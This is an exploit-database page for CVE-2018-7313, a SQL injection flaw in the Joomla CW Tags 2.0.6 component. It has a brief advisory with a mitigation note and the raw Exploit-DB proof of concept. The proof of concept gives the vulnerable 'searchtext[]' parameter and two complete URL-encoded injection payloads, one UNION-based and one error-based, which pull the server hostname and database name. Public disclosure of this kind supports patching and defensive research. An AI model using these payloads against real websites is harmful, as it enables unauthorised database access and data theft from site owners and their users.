header-logo
Suggest Exploit
vendor:
CW Tags
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: CW Tags
Affected Version From: 2.0.6
Affected Version To: 2.0.6
Patch Exists: YES
Related CWE: CVE-2018-7313
CPE: 2.0.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component CW Tags 2.0.6 – SQL Injection

Joomla! Component CW Tags 2.0.6 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'searchtext[]' parameter of the 'index.php' script. An attacker can send a malicious SQL query to the vulnerable parameter to gain access to the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component CW Tags 2.0.6 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: http://www.cwjoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/search-a-indexing/tags-a-clouds/cw-tags/
# Version: 2.0.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7313
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_cwtags&searchtext[]=[SQL]
# 
# %2d%45%66%65%27%29%20%20%2f%2a%21%30%33%33%33%33%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%33%33%33%33%53%45%4c%45%43%54%2a%2f%20%40%40%48%4f%53%54%4e%41%4d%45%2d%2d%20%2d
# 
# %31%27%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%64%61%74%61%62%61%73%65%28%29%20%61%73%20%63%68%61%72%29%2c%30%78%37%65%29%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%64%61%74%61%62%61%73%65%28%29%20%6c%69%6d%69%74%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%67%72%6f%75%70%20%62%79%20%78%29%61%29%20%41%4e%44%20%27%27%3d%27
# 
# # # #

Navigation

Suggest Exploit

Services By CQR